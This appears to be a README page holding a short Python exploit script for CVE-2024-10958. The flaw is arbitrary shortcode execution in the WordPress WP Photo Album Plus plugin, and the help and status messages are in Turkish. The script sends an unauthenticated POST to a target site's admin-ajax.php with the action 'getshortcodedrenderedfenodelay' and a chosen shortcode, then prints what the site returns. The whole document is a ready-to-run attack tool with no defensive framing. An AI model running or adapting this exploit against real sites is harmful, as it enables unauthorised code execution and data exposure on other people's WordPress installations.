README.md
Rendering markdown...
#!/usr/bin/env python3
import requests
import argparse
import sys
banner = """
WordPress WP Photo Album Plus
Arbitrary Shortcode Execution
CVE-2024-10958
"""
def parse_args():
parser = argparse.ArgumentParser(description='WP Photo Album Plus Exploit')
parser.add_argument('-u', '--url', required=True, help='Hedef URL (örn: http://example.com)')
parser.add_argument('-s', '--shortcode', default='[user_info]', help='Çalıştırılacak shortcode')
return parser.parse_args()
def exploit_wppa_shortcode(target_url, shortcode):
print(f"[*] Hedef: {target_url}")
print(f"[*] Shortcode: {shortcode}")
endpoint = f"{target_url}/wp-admin/admin-ajax.php"
payload = {
'action': 'getshortcodedrenderedfenodelay',
'shortcode': shortcode
}
try:
response = requests.post(endpoint, data=payload)
if response.status_code == 200:
print("[+] Exploit başarılı!")
print("[+] Yanıt:", response.text)
return True
else:
print("[-] Exploit başarısız!")
return False
except Exception as e:
print(f"[-] Hata: {str(e)}")
return False
def main():
print(banner)
args = parse_args()
exploit_wppa_shortcode(args.url, args.shortcode)
if __name__ == '__main__':
main()